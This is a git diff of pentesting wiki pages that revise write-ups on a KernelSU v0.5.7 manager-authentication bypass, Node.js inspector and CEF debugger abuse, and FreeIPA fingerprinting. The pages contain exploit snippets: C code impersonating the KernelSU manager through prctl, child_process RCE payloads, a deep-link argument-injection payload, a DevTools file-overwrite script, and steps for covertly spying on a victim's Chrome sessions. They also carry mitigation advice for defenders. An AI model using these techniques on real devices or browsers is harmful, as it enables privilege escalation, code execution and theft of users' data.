+- [3] [setuid(2) — Linux manual page](https://man7.org/linux/man-pages/man2/setuid.2.html)
+- [4] [execve(2) — Linux manual page](https://man7.org/linux/man-pages/man2/execve.2.html)
+- [5] [passwd(5) — Linux manual page](https://man7.org/linux/man-pages/man5/passwd.5.html)
+- [6] [sudoers(5) — Debian Manpages](https://manpages.debian.org/testing/sudo/sudoers.5.en.html)
+- [7] [Protect the Docker daemon socket](https://docs.docker.com/engine/security/protect-access/)
+- [8] [dockerd — Docker Docs](https://docs.docker.com/reference/cli/dockerd/)
+- [9] [ldd(1) — Linux manual page](https://man7.org/linux/man-pages/man1/ldd.1.html)
+- [10] [ld.so(8) — Linux manual page](https://man7.org/linux/man-pages/man8/ld.so.8.html)
+- [11] [objdump (GNU Binary Utilities)](https://sourceware.org/binutils/docs/binutils/objdump.html)
+- [12] [audit_open(3) — Debian Manpages](https://manpages.debian.org/trixie/libaudit-dev/audit_open.3.en.html)
+- [13] [audit_log_user_message(3) — Debian Manpages](https://manpages.debian.org/testing/libaudit-dev/audit_log_user_message.3.en.html)
+- [14] [audit_log_acct_message(3) — Debian Manpages](https://manpages.debian.org/testing/libaudit-dev/audit_log_acct_message.3.en.html)
+- [15] [Common Attributes (Using the GNU Compiler Collection)](https://gcc.gnu.org/onlinedocs/gcc/Common-Attributes.html)
+- [16] [chpasswd(8) — Linux manual page](https://man7.org/linux/man-pages/man8/chpasswd.8.html)
+- [17] [mkpasswd.c — Debian Sources](https://sources.debian.org/src/whois/5.5.17/mkpasswd.c)
+- [18] [openssl-passwd — OpenSSL Documentation](https://docs.openssl.org/master/man1/openssl-passwd/)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/linux-hardening/software-information/android-rooting-frameworks-manager-auth-bypass-syscall-hook.md
+++ b/src/linux-hardening/software-information/android-rooting-frameworks-manager-auth-bypass-syscall-hook.md
@@ -1,32 +1,26 @@
 # Android Rooting Frameworks (KernelSU/Magisk) Manager Auth Bypass & Syscall Hook Abuse
 
-{{#include ../../banners/hacktricks-training.md}}
-
-Rooting frameworks like KernelSU, APatch, SKRoot and Magisk frequently patch the Linux/Android kernel and expose privileged functionality to an unprivileged userspace "manager" app via a hooked syscall. If the manager-authentication step is flawed, any local app can reach this channel and escalate privileges on already-rooted devices.
+Rooting frameworks such as KernelSU, APatch and SKRoot patch or hook the Android/Linux kernel and expose privileged functionality to an unprivileged userspace manager app. Magisk is discussed separately below because CVE-2024-48336 involved manager-side code loading rather than this KernelSU syscall path.<sup>[[1]](#references)[[5]](#references)[[13]](#references)</sup>
 
 This page abstracts the techniques and pitfalls uncovered in public research (notably Zimperium’s analysis of KernelSU v0.5.7) to help both red and blue teams understand attack surfaces, exploitation primitives, and robust mitigations.<sup>[[1]](#references)</sup>
 
 ---
 ## Architecture pattern: syscall-hooked manager channel
 
-- Kernel module/patch hooks a syscall (commonly prctl) to receive "commands" from userspace.
-- Protocol typically is: magic_value, command_id, arg_ptr/len ...
-- A userspace manager app authenticates first (e.g., CMD_BECOME_MANAGER). Once the kernel marks the caller as a trusted manager, privileged commands are accepted:
-  - Grant root to caller (e.g., CMD_GRANT_ROOT)
-  - Manage allowlists/deny-lists for su
-  - Adjust SELinux policy (e.g., CMD_SET_SEPOLICY)
-  - Query version/configuration
-- Because any app can invoke syscalls, the correctness of the manager authentication is critical.
+- In KernelSU v0.5.7, a kernel hook on `prctl` receives a magic value, command ID and command-specific arguments from userspace.<sup>[[1]](#references)[[2]](#references)[[11]](#references)</sup>
+- The caller first requests manager status with `CMD_BECOME_MANAGER`. Authorization is command-specific: `CMD_GRANT_ROOT` checks the manager/allowlist state, `CMD_ALLOW_SU` is manager-only, and `CMD_SET_SEPOLICY` is root-only in this version.<sup>[[2]](#references)[[11]](#references)</sup>
+- Other commands query version/configuration or report framework events.<sup>[[2]](#references)</sup>
+- Because any app can invoke this syscall interface, the correctness of manager authentication is critical.<sup>[[1]](#references)[[2]](#references)</sup>
 
 Example (KernelSU design):
 - Hooked syscall: prctl
 - Magic value to divert to KernelSU handler: 0xDEADBEEF
-- Commands include: CMD_BECOME_MANAGER, CMD_GET_VERSION, CMD_ALLOW_SU, CMD_SET_SEPOLICY, CMD_GRANT_ROOT, etc.
+- Commands include: CMD_BECOME_MANAGER, CMD_GET_VERSION, CMD_ALLOW_SU, CMD_SET_SEPOLICY, CMD_GRANT_ROOT, etc.<sup>[[1]](#references)[[2]](#references)[[11]](#references)</sup>
 
 ---
 ## KernelSU v0.5.7 authentication flow (as implemented)
 
-When userspace calls prctl(0xDEADBEEF, CMD_BECOME_MANAGER, data_dir_path, ...), KernelSU verifies:
+When userspace calls prctl(0xDEADBEEF, CMD_BECOME_MANAGER, data_dir_path, ...), KernelSU verifies:<sup>[[1]](#references)[[2]](#references)[[11]](#references)</sup>
 
 1) Path prefix check
 - The provided path must start with an expected prefix for the caller UID, e.g. /data/data/<pkg> or /data/user/<id>/<pkg>.
@@ -37,45 +31,49 @@ When userspace calls prctl(0xDEADBEEF, CMD_BECOME_MANAGER, data_dir_path, ...), 
   - Reference: core_hook.c (v0.5.7) ownership logic.<sup>[[2]](#references)</sup>
 
 3) APK signature check via FD table scan
-- Iterate the calling process’ open file descriptors (FDs).
-- Pick the first file whose path matches /data/app/*/base.apk.
+- Iterate the calling process’ open file descriptors in increasing descriptor order.
+- For each regular file whose path starts with `/data/app/` and ends with `/base.apk`, require the path to contain the package substring derived from the supplied data-directory path.
+- Verify the signature of the first candidate that passes those path checks.
 - Parse APK v2 signature and verify against the official manager certificate.
   - References: manager.c (iterating FDs), apk_sign.c (APK v2 verification).<sup>[[3]](#references)[[4]](#references)</sup>
 
-If all checks pass, the kernel caches the manager’s UID temporarily and accepts privileged commands from that UID until reset.
+If all checks pass, the kernel caches the manager’s UID temporarily; manager-only commands then accept that UID, while other commands retain their own UID or allowlist checks.<sup>[[2]](#references)[[3]](#references)</sup>
 
 ---
-## Vulnerability class: trusting “the first matching APK” from FD iteration
+## Vulnerability class: trusting path-derived APK selection
 
-If the signature check binds to "the first matching /data/app/*/base.apk" found in the process FD table, it is not actually verifying the caller’s own package. An attacker can pre-position a legitimately signed APK (the real manager’s) so that it appears earlier in the FD list than their own base.apk.
+KernelSU v0.5.7 does not bind the signature result to PackageManager’s installed package identity. In `manager.c`, the package test is only a path substring check (`strstr(cwd, pkg)`); the first candidate that passes that test is then signature-checked. An attacker can therefore place a genuine manager APK under a `/data/app/` path that also contains the attacker’s package name and arrange for it to be selected first.<sup>[[1]](#references)[[3]](#references)[[4]](#references)</sup>
 
 This trust-by-indirection lets an unprivileged app impersonate the manager without owning the manager’s signing key.<sup>[[1]](#references)</sup>
 
-Key properties exploited:<sup>[[1]](#references)</sup>
-- The FD scan does not bind to the caller’s package identity; it only pattern-matches path strings.
+Key properties exploited:<sup>[[1]](#references)[[3]](#references)</sup>
+- The FD scan is ordered by descriptor index and the package check is a path substring test, not a verified package-to-APK identity binding.
 - open() returns the lowest available FD. By closing lower-numbered FDs first, an attacker can control ordering.
-- The filter only checks that the path matches /data/app/*/base.apk – not that it corresponds to the installed package of the caller.
+- A bundled manager APK can be placed under `/data/app/` at a path containing the attacker’s package string while retaining the official manager signature.
 
 ---
 ## Attack preconditions
 
+The concrete KernelSU v0.5.7 case requires:<sup>[[1]](#references)[[3]](#references)</sup>
+
 - The device is already rooted with a vulnerable rooting framework (e.g., KernelSU v0.5.7).
 - The attacker can run arbitrary unprivileged code locally (Android app process).
+- For the v0.5.7 implementation, `current->real_parent` must have UID 0 (the source comment describes this as a zygote direct-child requirement); `manager.c` rejects other parents.<sup>[[3]](#references)</sup>
 - The real manager has not yet authenticated (e.g., right after a reboot). Some frameworks cache the manager UID after success; you must win the race.<sup>[[1]](#references)</sup>
 
 ---
 ## Exploitation outline (KernelSU v0.5.7)
 
-High-level steps:<sup>[[1]](#references)[[9]](#references)</sup>
+High-level steps (the cited demo video shows the public proof of concept in operation):<sup>[[1]](#references)[[2]](#references)[[10]](#references)</sup>
 1) Build a valid path to your own app data directory to satisfy prefix and ownership checks.
-2) Ensure a genuine KernelSU Manager base.apk is opened on a lower-numbered FD than your own base.apk.
+2) Place a genuine KernelSU Manager base.apk under `/data/app/` at a path containing your package string, then open it on a lower-numbered FD than your own base.apk.
 3) Invoke prctl(0xDEADBEEF, CMD_BECOME_MANAGER, <your_data_dir>, ...) to pass the checks.
-4) Issue privileged commands like CMD_GRANT_ROOT, CMD_ALLOW_SU, CMD_SET_SEPOLICY to persist elevation.
+4) Use `CMD_GRANT_ROOT`, then `CMD_ALLOW_SU` for persistent su; invoke root-only `CMD_SET_SEPOLICY` only after obtaining root and only where supported.
 
 Practical notes on step 2 (FD ordering):<sup>[[1]](#references)</sup>
 - Identify your process’ FD for your own /data/app/*/base.apk by walking /proc/self/fd symlinks.
 - Close a low FD (e.g., stdin, fd 0) and open the legitimate manager APK first so it occupies fd 0 (or any index lower than your own base.apk fd).
-- Bundle the legitimate manager APK with your app so its path satisfies the kernel’s naive filter. For example, place it under a subpath matching /data/app/*/base.apk.
+- Bundle the legitimate manager APK with your app so its path starts with `/data/app/`, ends with `/base.apk`, and contains your package string. For example, a path under your app’s `lib` directory can satisfy these checks.<sup>[[1]](#references)[[3]](#references)</sup>
 
 Example code snippets (Android/Linux, illustrative only):
 
@@ -121,34 +119,31 @@ void preopen_legit_manager_lowfd(const char *legit_apk_path) {
 }
 ```
 
-Manager authentication via prctl hook:
+Manager authentication via the KernelSU v0.5.7 `prctl` hook:<sup>[[1]](#references)[[2]](#references)[[11]](#references)</sup>
 ```c
 #include <sys/prctl.h>
 #include <stdint.h>
 
 #define KSU_MAGIC          0xDEADBEEF
-#define CMD_BECOME_MANAGER 0x100  // Placeholder; command IDs are framework-specific
-
-static inline long ksu_call(unsigned long cmd, unsigned long arg2,
-                            unsigned long arg3, unsigned long arg4) {
-    return prctl(KSU_MAGIC, cmd, arg2, arg3, arg4);
-}
+#define CMD_BECOME_MANAGER 1  // KernelSU v0.5.7; other frameworks differ
 
 int become_manager(const char *my_data_dir) {
-    long result = -1;
-    // arg2: command, arg3: pointer to data path (userspace->kernel copy), arg4: optional result ptr
-    result = ksu_call(CMD_BECOME_MANAGER, (unsigned long)my_data_dir, 0, 0);
-    return (int)result;
+    uint32_t reply = 0;
+    // arg3: data path; arg4: unused; arg5: userspace result pointer
+    (void)prctl(KSU_MAGIC, CMD_BECOME_MANAGER,
+                (unsigned long)my_data_dir, 0UL,
+                (unsigned long)&reply);
+    return reply == KSU_MAGIC ? 0 : -1;
 }
 ```
 
-After success, privileged commands (examples):
+After success, privileged commands (examples):<sup>[[2]](#references)[[11]](#references)</sup>
 - CMD_GRANT_ROOT: promote current process to root
 - CMD_ALLOW_SU: add your package/UID to allowlist for persistent su
-- CMD_SET_SEPOLICY: adjust SELinux policy as supported by framework
+- CMD_SET_SEPOLICY: adjust SELinux policy after obtaining root; KernelSU v0.5.7 checks for UID 0 for this command.<sup>[[2]](#references)</sup>
 
 Race/persistence tip:
-- Register a BOOT_COMPLETED receiver in AndroidManifest (RECEIVE_BOOT_COMPLETED) to start early after reboot and attempt authentication before the real manager.<sup>[[1]](#references)</sup>
+- Register a BOOT_COMPLETED receiver in AndroidManifest (`RECEIVE_BOOT_COMPLETED`) to start after reboot and attempt authentication before the real manager; the permission authorizes receipt of `ACTION_BOOT_COMPLETED` but does not itself guarantee scheduling priority.<sup>[[1]](#references)[[12]](#references)</sup>
 
 ---
 ## Detection and mitigation guidance
@@ -162,11 +157,11 @@ For framework developers:
 - Consider binder-based authenticated IPC instead of overloading generic syscalls when feasible.
 
 For defenders/blue team:
-- Detect presence of rooting frameworks and manager processes; monitor for prctl calls with suspicious magic constants (e.g., 0xDEADBEEF) if you have kernel telemetry.
+- Detect presence of rooting frameworks and manager processes; monitor for prctl calls with suspicious magic constants (e.g., 0xDEADBEEF) if you have kernel telemetry.<sup>[[1]](#references)[[11]](#references)</sup>
 - On managed fleets, block or alert on boot receivers from untrusted packages that rapidly attempt privileged manager commands post-boot.
 - Ensure devices are updated to patched framework versions; invalidate cached manager IDs on update.
 
-Limitations of the attack:
+Limitations of the attack:<sup>[[1]](#references)[[2]](#references)</sup>
 - Only affects devices already rooted with a vulnerable framework.
 - Typically requires a reboot/race window before the legitimate manager authenticates (some frameworks cache manager UID until reset).
 
@@ -174,20 +169,24 @@ Limitations of the attack:
 ## Related notes across frameworks
 
 - Password-based auth (e.g., historical APatch/SKRoot builds) can be weak if passwords are guessable/bruteforceable or validations are buggy.<sup>[[1]](#references)[[6]](#references)[[7]](#references)</sup>
-- Package/signature-based auth (e.g., KernelSU) is stronger in principle but must bind to the actual caller, not indirect artefacts like FD scans.<sup>[[1]](#references)[[5]](#references)</sup>
-- Magisk: CVE-2024-48336 (MagiskEoP) showed that even mature ecosystems can be susceptible to identity spoofing leading to code execution with root inside manager context.<sup>[[1]](#references)[[8]](#references)</sup>
+- Package/signature-based auth (e.g., KernelSU) is stronger in principle but must bind to the actual caller, not path-derived artefacts selected through FD scans.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
+- Magisk: CVE-2024-48336 affected pre-Canary 27007 builds that loaded code from an unverified GMS package, allowing a local app to execute code in the Magisk app and escalate to root without user interaction.<sup>[[8]](#references)[[9]](#references)[[13]](#references)</sup>
 
 ---
 ## References
 
 - [1] [Zimperium – The Rooting of All Evil: Security Holes That Could Compromise Your Mobile Device](https://zimperium.com/blog/the-rooting-of-all-evil-security-holes-that-could-compromise-your-mobile-device)
-- [2] [KernelSU v0.5.7 – core_hook.c path checks (L193, L201)](https://github.com/tiann/KernelSU/blob/v0.5.7/kernel/core_hook.c#L193)
-- [3] [KernelSU v0.5.7 – manager.c FD iteration/signature check (L43+)](https://github.com/tiann/KernelSU/blob/v0.5.7/kernel/manager.c#L43)
-- [4] [KernelSU – apk_sign.c APK v2 verification (main)](https://github.com/tiann/KernelSU/blob/main/kernel/apk_sign.c#L319)
+- [2] [KernelSU v0.5.7 – core_hook.c authentication checks](https://github.com/tiann/KernelSU/blob/v0.5.7/kernel/core_hook.c#L149-L205)
+- [3] [KernelSU v0.5.7 – manager.c FD iteration, package check and signature call](https://github.com/tiann/KernelSU/blob/v0.5.7/kernel/manager.c#L16-L67)
+- [4] [KernelSU v0.5.7 – apk_sign.c APK v2 verification](https://github.com/tiann/KernelSU/blob/v0.5.7/kernel/apk_sign.c#L6-L119)
 - [5] [KernelSU project](https://kernelsu.org/)
 - [6] [APatch](https://github.com/bmax121/APatch)
 - [7] [SKRoot](https://github.com/abcz316/SKRoot-linuxKernelRoot)
-- [8] [MagiskEoP – CVE-2024-48336](https://github.com/canyie/MagiskEoP)
-- [9] [KSU PoC demo video (Wistia)](https://zimperium-1.wistia.com/medias/ep1dg4t2qg?videoFoam=true)
+- [8] [Magisk issue #8279 – Verify GMS is system app](https://github.com/topjohnwu/Magisk/issues/8279)
+- [9] [MagiskEoP – CVE-2024-48336](https://github.com/canyie/MagiskEoP)
+- [10] [KSU PoC demo video (Wistia)](https://zimperium-1.wistia.com/medias/ep1dg4t2qg?videoFoam=true)
+- [11] [KernelSU v0.5.7 – ksu.h command identifiers](https://github.com/tiann/KernelSU/blob/v0.5.7/kernel/ksu.h#L12-L24)
+- [12] [Android Manifest.permission.RECEIVE_BOOT_COMPLETED](https://developer.android.com/reference/android/Manifest.permission#RECEIVE_BOOT_COMPLETED)
+- [13] [NVD – CVE-2024-48336](https://nvd.nist.gov/vuln/detail/CVE-2024-48336)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/linux-hardening/software-information/electron-cef-chromium-debugger-abuse.md
+++ b/src/linux-hardening/software-information/electron-cef-chromium-debugger-abuse.md
@@ -1,39 +1,39 @@
 # Node inspector/CEF debug abuse
 
-{{#include ../../banners/hacktricks-training.md}}
+Historical practical examples include the Multimaster walkthrough and the CVE-2019-1414 Visual Studio Code debugger attack; use them as version-specific context rather than assuming every current Electron or Chromium target exposes the same primitives.<sup>[[1]](#references)[[3]](#references)</sup>
 
 ## Basic Information
 
-[From the docs](https://origin.nodejs.org/ru/docs/guides/debugging-getting-started): When started with the `--inspect` switch, a Node.js process listens for a debugging client. By **default**, it will listen at host and port **`127.0.0.1:9229`**. Each process is also assigned a **unique** **UUID**.<sup>[[4]](#references)</sup>
+[From the docs](https://nodejs.org/learn/getting-started/debugging): When started with the `--inspect` switch, a Node.js process listens for a debugging client. By **default**, it will listen at host and port **`127.0.0.1:9229`**. Each process is also assigned a **unique** **UUID**.<sup>[[4]](#references)</sup>
 
 Inspector clients must know and specify host address, port, and UUID to connect. A full URL will look something like `ws://127.0.0.1:9229/0f2c936f-b1cd-4ac9-aab3-f63b0f33d55e`.<sup>[[4]](#references)</sup>
 
 > [!WARNING]
-> Since the **debugger has full access to the Node.js execution environment**, a malicious actor able to connect to this port may be able to execute arbitrary code on behalf of the Node.js process (**potential privilege escalation**).
+> Since the **debugger has full access to the Node.js execution environment**, a malicious actor able to connect to this port may be able to execute arbitrary code on behalf of the Node.js process (**potential privilege escalation**).<sup>[[4]](#references)</sup>
 
-There are several ways to start an inspector:
+There are several ways to start an inspector:<sup>[[4]](#references)</sup>
 
 ```bash
 node --inspect app.js #Will run the inspector in port 9229
 node --inspect=4444 app.js #Will run the inspector in port 4444
 node --inspect=0.0.0.0:4444 app.js #Will run the inspector all ifaces and port 4444
 node --inspect-brk=0.0.0.0:4444 app.js #Will run the inspector all ifaces and port 4444
-# --inspect-brk is equivalent to --inspect
+# --inspect-brk also pauses at the start of the user script
 
 node --inspect --inspect-port=0 app.js #Will run the inspector in a random port
 # Note that using "--inspect-port" without "--inspect" or "--inspect-brk" won't run the inspector
 ```
 
-When you start an inspected process something like this will appear:
+When you start an inspected process something like this will appear:<sup>[[4]](#references)</sup>
 
 ```
 Debugger ending on ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d
 For help, see: https://nodejs.org/en/docs/inspector
 ```
 
-Processes based on **CEF** (**Chromium Embedded Framework**) like need to use the param: `--remote-debugging-port=9222` to open de **debugger** (the SSRF protections remain very similar). However, they **instead** of granting a **NodeJS** **debug** session will communicate with the browser using the [**Chrome DevTools Protocol**](https://chromedevtools.github.io/devtools-protocol/), this is an interface to control the browser, but there isn't a direct RCE.<sup>[[5]](#references)</sup>
+Processes based on **CEF** (**Chromium Embedded Framework**) can expose a debugger with `--remote-debugging-port=9222`. This exposes the browser through the [**Chrome DevTools Protocol**](https://chromedevtools.github.io/devtools-protocol/) rather than a Node.js inspector, so Node.js `process`-based payloads are not directly applicable by default.<sup>[[2]](#references)[[5]](#references)</sup>
 
-When you start a debugged browser something like this will appear:
+When you start a debugged browser something like this will appear:<sup>[[2]](#references)[[5]](#references)</sup>
 
 ```
 DevTools listening on ws://127.0.0.1:9222/devtools/browser/7d7aa9d9-7c61-4114-b4c6-fcf5c35b4369
@@ -41,14 +41,14 @@ DevTools listening on ws://127.0.0.1:9222/devtools/browser/7d7aa9d9-7c61-4114-b4
 
 ### Browsers, WebSockets and same-origin policy <a href="#browsers-websockets-and-same-origin-policy" id="browsers-websockets-and-same-origin-policy"></a>
 
-Websites open in a web-browser can make WebSocket and HTTP requests under the browser security model. An **initial HTTP connection** is necessary to **obtain a unique debugger session id**. The **same-origin-policy** **prevents** websites from being able to make **this HTTP connection**. For additional security against [**DNS rebinding attacks**](https://en.wikipedia.org/wiki/DNS_rebinding)**,** Node.js verifies that the **'Host' headers** for the connection either specify an **IP address** or **`localhost`** or **`localhost6`** precisely.<sup>[[12]](#references)</sup>
+Websites open in a web-browser can make WebSocket and HTTP requests under the browser security model. An **initial HTTP connection** is necessary to **obtain a unique debugger session id**. The **same-origin-policy** **prevents** websites from being able to make **this HTTP connection**. For additional security against [**DNS rebinding attacks**](https://en.wikipedia.org/wiki/DNS_rebinding)**,** Node.js verifies that the **'Host' headers** for the connection either specify an **IP address** or **`localhost`** precisely.<sup>[[4]](#references)</sup>
 
 > [!TIP]
-> This **security measures prevents exploiting the inspector** to run code by **just sending a HTTP request** (which could be done exploiting a SSRF vuln).
+> This **security measures prevents exploiting the inspector** to run code by **just sending a HTTP request** (which could be done exploiting a SSRF vuln).<sup>[[4]](#references)</sup>
 
 ### Starting inspector in running processes
 
-You can send the **signal SIGUSR1** to a running nodejs process to make it **start the inspector** in the default port. However, note that you need to have enough privileges, so this might grant you **privileged access to information inside the process** but no a direct privilege escalation.
+You can send the **signal SIGUSR1** to a running nodejs process to make it **start the inspector** in the default port. However, note that you need to have enough privileges, so this might grant you **privileged access to information inside the process** but no a direct privilege escalation.<sup>[[4]](#references)</sup>
 
 ```bash
 kill -s SIGUSR1 <nodejs-ps>
@@ -56,15 +56,15 @@ kill -s SIGUSR1 <nodejs-ps>
 ```
 
 > [!TIP]
-> This is useful in containers because **shutting down the process and starting a new one** with `--inspect` is **not an option** because the **container** will be **killed** with the process.
+> This is useful in containers because **shutting down the process and starting a new one** with `--inspect` is **not an option** because the **container** will be **killed** with the process.<sup>[[6]](#references)</sup>
 
 ### Connect to inspector/debugger
 
-To connect to a **Chromium-based browser**, the `chrome://inspect` or `edge://inspect` URLs can be accessed for Chrome or Edge, respectively. By clicking the Configure button, it should be ensured that the **target host and port** are correctly listed. The image shows a Remote Code Execution (RCE) example:
+To connect to a **Chromium-based browser**, the `chrome://inspect` or `edge://inspect` URLs can be accessed for Chrome or Edge, respectively. By clicking the Configure button, it should be ensured that the **target host and port** are correctly listed. The image shows a Remote Code Execution (RCE) example:<sup>[[2]](#references)[[4]](#references)</sup>
 
 ![After an URL to access the debugger will appear. e.g. ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d - Connect to inspector/debugger: To connect to a Chromium-based browser ,...](<../../images/image (674).png>)
 
-Using the **command line** you can connect to a debugger/inspector with:
+Using the **command line** you can connect to a debugger/inspector with:<sup>[[2]](#references)[[4]](#references)</sup>
 
 ```bash
 node inspect <ip>:<port>
@@ -73,7 +73,7 @@ node inspect 127.0.0.1:9229
 debug> exec("process.mainModule.require('child_process').exec('/Applications/iTerm.app/Contents/MacOS/iTerm2')")
 ```
 
-The tool [**https://github.com/taviso/cefdebug**](https://github.com/taviso/cefdebug), allows to **find inspectors** running locally and **inject code** into them.<sup>[[1]](#references)[[2]](#references)[[11]](#references)[[13]](#references)</sup>
+The tool [**https://github.com/taviso/cefdebug**](https://github.com/taviso/cefdebug), allows to **find inspectors** running locally and **inject code** into them.<sup>[[2]](#references)</sup>
 
 ```bash
 #List possible vulnerable sockets
@@ -85,14 +85,14 @@ The tool [**https://github.com/taviso/cefdebug**](https://github.com/taviso/cefd
 ```
 
 > [!TIP]
-> Note that **NodeJS RCE exploits won't work** if connected to a browser via [**Chrome DevTools Protocol**](https://chromedevtools.github.io/devtools-protocol/) (you need to check the API to find interesting things to do with it).
+> Note that **NodeJS RCE exploits won't work** if connected to a browser via [**Chrome DevTools Protocol**](https://chromedevtools.github.io/devtools-protocol/) (you need to check the API to find interesting things to do with it).<sup>[[2]](#references)[[5]](#references)</sup>
 
 ## RCE in NodeJS Debugger/Inspector
 
 > [!TIP]
 > If you came here looking how to get [**RCE from a XSS in Electron please check this page.**](../../network-services-pentesting/pentesting-web/electron-desktop-apps/index.html)
 
-Some common ways to obtain **RCE** when you can **connect** to a Node **inspector** is using something like (looks that this **won't work in a connection to Chrome DevTools protocol**):<sup>[[3]](#references)</sup>
+Some common ways to obtain **RCE** when you can **connect** to a Node **inspector** is using something like (looks that this **won't work in a connection to Chrome DevTools protocol**):<sup>[[2]](#references)</sup>
 
 ```javascript
 process.mainModule.require("child_process").exec("calc")
@@ -103,14 +103,14 @@ Browser.open(JSON.stringify({ url: "c:\\windows\\system32\\calc.exe" }))
 
 ## Chrome DevTools Protocol Payloads
 
-You can check the API here: [https://chromedevtools.github.io/devtools-protocol/](https://chromedevtools.github.io/devtools-protocol/)<sup>[[5]](#references)</sup>\
+You can check the API here: [https://chromedevtools.github.io/devtools-protocol/](https://chromedevtools.github.io/devtools-protocol/).<sup>[[5]](#references)</sup>
 In this section I will just list interesting things I find people have used to exploit this protocol.
 
 ### Parameter Injection via Deep Links
 
 In the [**CVE-2021-38112**](https://rhinosecuritylabs.com/aws/cve-2021-38112-aws-workspaces-rce/) Rhino security discovered that an application based on CEF **registered a custom UR**I in the system (workspaces://index.html) that received the full URI and then **launched the CEF based applicatio**n with a configuration that was partially constructing from that URI.<sup>[[8]](#references)</sup>
 
-It was discovered that the URI parameters where URL decoded and used to launch the CEF basic application, allowing a user to **inject** the flag **`--gpu-launcher`** in the **command line** and execute arbitrary things.
+It was discovered that the URI parameters where URL decoded and used to launch the CEF basic application, allowing a user to **inject** the flag **`--gpu-launcher`** in the **command line** and execute arbitrary things.<sup>[[8]](#references)</sup>
 
 So, a payload like:
 
@@ -118,11 +118,11 @@ So, a payload like:
 workspaces://anything%20--gpu-launcher=%22calc.exe%22@REGISTRATION_CODE
 ```
 
-Will execute a calc.exe.
+Will execute a calc.exe.<sup>[[8]](#references)</sup>
 
 ### Overwrite Files
 
-Change the folder where **downloaded files are going to be saved** and download a file to **overwrite** frequently used **source code** of the application with your **malicious code**.<sup>[[6]](#references)</sup>
+Change the folder where **downloaded files are going to be saved** and download a file to **overwrite** frequently used **source code** of the application with your **malicious code**.<sup>[[5]](#references)[[6]](#references)</sup>
 
 ```javascript
 ws = new WebSocket(url) //URL of the chrome devtools service
@@ -140,13 +140,15 @@ ws.send(
 
 ### Webdriver RCE and exfiltration
 
-According to this post: [https://medium.com/@knownsec404team/counter-webdriver-from-bot-to-rce-b5bfb309d148](https://medium.com/@knownsec404team/counter-webdriver-from-bot-to-rce-b5bfb309d148) it's possible to obtain RCE and exfiltrate internal pages from theriver.<sup>[[9]](#references)[[10]](#references)</sup>
+STAR Labs showed that exposed WebDriver/CDP services can enable arbitrary file reads and RCE; DNS rebinding can complete the exploit chain in some configurations.<sup>[[9]](#references)</sup>
+
+For additional historical browser-automation and Chromium security cases, see the Counter WebDriver write-up and Project Zero issues 773, 1742, and 1944.<sup>[[10]](#references)[[11]](#references)[[12]](#references)[[13]](#references)</sup>
 
 ### Post-Exploitation
 
 In a real environment and **after compromising** a user PC that uses Chrome/Chromium based browser you could launch a Chrome process with the **debugging activated and port-forward the debugging port** so you can access it. This way you will be able to **inspect everything the victim does with Chrome and steal sensitive information**.<sup>[[7]](#references)</sup>
 
-The stealth way is to **terminate every Chrome process** and then call something like
+The stealth way is to **terminate every Chrome process** and then call something like:<sup>[[7]](#references)</sup>
 
 ```bash
 Start-Process "Chrome" "--remote-debugging-port=9222 --restore-last-session"
@@ -157,7 +159,7 @@ Start-Process "Chrome" "--remote-debugging-port=9222 --restore-last-session"
 - [1] [HackTheBox - Multimaster (IppSec)](https://www.youtube.com/watch?v=iwR746pfTEc&t=6345s)
 - [2] [taviso/cefdebug - CEF/Chromium debugger inspection and exploitation tool](https://github.com/taviso/cefdebug)
 - [3] [CVE-2019-1414: Visual Studio Code Remote Code Execution via Chrome DevTools Debugger](https://iwantmore.pizza/posts/cve-2019-1414.html)
-- [4] [Node.js Debugging Guide - Getting Started](https://nodejs.org/en/docs/guides/debugging-getting-started/)
+- [4] [Node.js Debugging Guide - Getting Started](https://nodejs.org/learn/getting-started/debugging)
 - [5] [Chrome DevTools Protocol](https://chromedevtools.github.io/devtools-protocol/)
 - [6] [corCTF 2021 Writeup - saasme (Larry Yuan)](https://larry.science/post/corctf-2021/#saasme-2-solves)
 - [7] [Post-Exploitation: Abusing Chrome's Debugging Feature to Observe and Control Browsing Sessions Remotely](https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/)

--- a/src/linux-hardening/software-information/freeipa-pentesting.md
+++ b/src/linux-hardening/software-information/freeipa-pentesting.md
@@ -1,14 +1,14 @@
 # FreeIPA Pentesting
 
-{{#include ../../banners/hacktricks-training.md}}
-
 ## Basic Information
 
-FreeIPA is an open-source **alternative** to Microsoft Windows **Active Directory**, mainly for **Unix** environments. It combines a complete **LDAP directory** with an MIT **Kerberos** Key Distribution Center for management akin to Active Directory. Utilizing the Dogtag **Certificate System** for CA & RA certificate management, it supports **multi-factor** authentication, including smartcards. SSSD is integrated for Unix authentication processes.
+FreeIPA is an open-source **alternative** to Microsoft Windows **Active Directory**, mainly for **Unix** environments. It combines a complete **LDAP directory** with an MIT **Kerberos** Key Distribution Center for management akin to Active Directory. Utilizing the Dogtag **Certificate System** for CA & RA certificate management, it supports **multi-factor** authentication, including smartcards. SSSD is integrated for Unix authentication processes.<sup>[[2]](#references)[[9]](#references)</sup>
 
 ## Fingerprints
 
 ### Files & Environment Variables
+
+These files and variables are useful host fingerprints in FreeIPA and Kerberos environments.<sup>[[2]](#references)</sup>
 
 - The file at `/etc/krb5.conf` is where Kerberos client information, necessary for enrollment in the domain, is stored. This includes KDCs and admin servers' locations, default settings, and mappings.
 - System-wide defaults for IPA clients and servers are set in the file located at `/etc/ipa/default.conf`.
@@ -17,7 +17,7 @@ FreeIPA is an open-source **alternative** to Microsoft Windows **Active Director
 
 ### Binaries
 
-Tools such as `ipa`, `kdestroy`, `kinit`, `klist`, `kpasswd`, `ksu`, `kswitch`, and `kvno` are key to managing FreeIPA domains, handling Kerberos tickets, changing passwords, and acquiring service tickets, among other functionalities.
+Tools such as `ipa`, `kdestroy`, `kinit`, `klist`, `kpasswd`, `ksu`, `kswitch`, and `kvno` are key to managing FreeIPA domains, handling Kerberos tickets, changing passwords, and acquiring service tickets, among other functionalities.<sup>[[2]](#references)</sup>
 
 ### Network
 
@@ -29,15 +29,15 @@ Authentication in FreeIPA, leveraging **Kerberos**, mirrors that in **Active Dir
 
 ### **CCACHE Ticket Files**
 
